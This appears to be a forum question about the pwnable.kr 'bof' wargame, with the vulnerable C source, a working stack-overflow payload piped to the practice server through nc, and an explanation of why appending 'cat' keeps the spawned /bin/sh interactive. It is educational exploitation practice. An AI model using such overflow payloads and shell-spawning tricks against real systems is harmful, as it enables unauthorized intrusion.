I usually use "python -c" to pass input to C programs,
like this:
$ python -c 'print "a" * 12' | ./program
But when I worked on the BOF practice program pwnable.kr/bof,
python -c 'print'
and
( python -c 'print'; cat )
behaved differently.
I wrote exploit code like this:
$ python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | nc pwnable.kr 9000
but it didn't work, so I found the stack_canary value.
$ python -c 'print "a"*32 +"\x0a"+ "a"*19 + "\xbe\xba\xfe\xca" ' | nc pwnable.kr 9000
but it still didn't work.
So I found other people's write-ups:
$ (python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'; cat) | nc pwnable.kr 9000
This exploit code successfully executed /bin/sh.
What is the difference between python -c 'print'
and (python -c 'print'; cat)?

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme); // smash me!  (unbounded read: the intended overflow)
    if(key == 0xcafebabe){
        system("/bin/sh");       // the spawned shell inherits this process's stdin
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}
(bof.c source code)
$ python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | nc pwnable.kr 9000
*** stack smashing detected ***: /home/bof/bof terminated
overflow me :
Nah..
$ python -c 'print "a"*32 +"\x0a"' | nc pwnable.kr 9000
overflow me :
Nah..
$ (python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'; cat) | nc pwnable.kr 9000
/bin/sh executed successfully
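Why the two pipelines behave differently, shown with an added local stand-in for the remote bof process (this is example code, not part of the question and not pwnable.kr's own code; the names target, payload, without_cat and with_cat are assumed). The stand-in reads one line the way gets() does, then starts a shell that inherits the same stdin, the way system("/bin/sh") does:

```sh
#!/bin/sh
# Added example: local model of `payload | bof` versus `(payload; cat) | bof`.
# `target` stands in for the remote process: one line is consumed (gets),
# then a shell is started on the *same* stdin (system("/bin/sh")).
target() {
    read -r _overflowme   # stand-in for gets(overflowme): eats the payload line
    sh                    # stand-in for system("/bin/sh"): reads commands from stdin
    # Only after the shell exits does func() return; with the canary clobbered by
    # the 52-byte overwrite, that is when the stack-protector abort would fire.
    echo "(shell exited; func returns here and the canary check runs)" >&2
}

# Stand-in for python -c 'print "a"*52 + ...': one line of padding, then exit.
payload() {
    printf 'aaaaaaaa\n'
}

# Form 1: the producer exits right after writing the payload, the pipe's write
# end closes, the shell reads EOF and exits without executing anything.
without_cat() {
    payload | target
}

# Form 2: cat stays alive after the payload and copies our own stdin into the
# same pipe, so the shell keeps receiving commands until we close it.
with_cat() {
    ( payload; cat ) | target
}

# Constructed input: a command we want the spawned shell to run.
printf 'echo from-the-shell\n' | without_cat   # prints nothing
printf 'echo from-the-shell\n' | with_cat      # prints: from-the-shell
```

In the first form the command we type never reaches the target at all: its stdin is the pipe from python, which is already at EOF, so /bin/sh exits at once, func() returns, and the clobbered canary triggers the "stack smashing detected" abort. In the second form cat keeps the write end of the pipe open and forwards the terminal, so the shell stays alive and runs what we type.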
When you run (python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'; cat) | nc pwnable.kr 9000
you successfully execute /bin/sh.
When you run python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | nc pwnable.kr 9000
you get the "stack smashing detected" message. Right? - KamilCuk